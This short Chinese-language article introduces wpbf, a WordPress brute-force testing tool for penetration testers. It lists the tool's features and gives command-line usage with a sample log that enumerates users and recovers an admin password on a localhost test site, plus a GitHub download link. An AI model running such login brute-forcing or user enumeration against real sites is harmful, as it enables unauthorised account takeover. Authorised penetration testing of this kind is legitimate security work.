WordPress系统暴力破解测试工具 – wpbf

时间:2022-04-26
本文章向大家介绍WordPress系统暴力破解测试工具 – wpbf,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

wpbf这款工具可以帮助渗透测试人员,针对WordPress博客后台进行爆破测试。

特性

  1. 用户名枚举和发现 多线程 自动使用博客内容中的关键字作为字典 HTTP代理支持 基本的Wordpress指纹探测 高级指纹探测插件

基本使用方法

$ ./wpbf.py http://localhost/wordpress/2012-02-26 14:26:18,793 - INFO - Target URL: http://localhost/wordpress/2012-02-26 14:26:18,844 - INFO - Checking URL and username...2012-02-26 14:26:18,845 - INFO - Enumerating users...2012-02-26 14:26:52,027 - INFO - Usernames: admin, test, guest2012-02-26 14:26:54,153 - INFO - 31 plugins will be tested2012-02-26 14:26:55,311 - INFO - 215 passwords will be tested2012-02-26 14:26:55,369 - INFO - Starting workers...2012-02-26 14:26:56,685 - INFO - WordPress version: 3.0.12012-02-26 14:26:57,570 - INFO - WordPress path in server: /var/www/wordpress/2012-02-26 14:27:08,624 - INFO - Plugin 'akismet' was found2012-02-26 14:27:10,292 - INFO - Plugin 'akismet' version: 2.5.5 (more info @ http://localhost/wordpress/wp-content/plugins/akismet/readme.txt)221 tasks left / 2.1 tasks per second / 1.76min left199 tasks left / 2.2 tasks per second / 1.51min left172 tasks left / 2.7 tasks per second / 1.06min left21 tasks left / 1.6 tasks per second / 0.22min left2012-02-26 14:57:23,245 - INFO - Password 'qawsed' found for username 'admin' on http://localhost/wordpress/wp-login.php

用户名枚举

$ ./wpbf.py -eu http://www.mysite.com/blog/

下载地址

https://github.com/atarantini/wpbf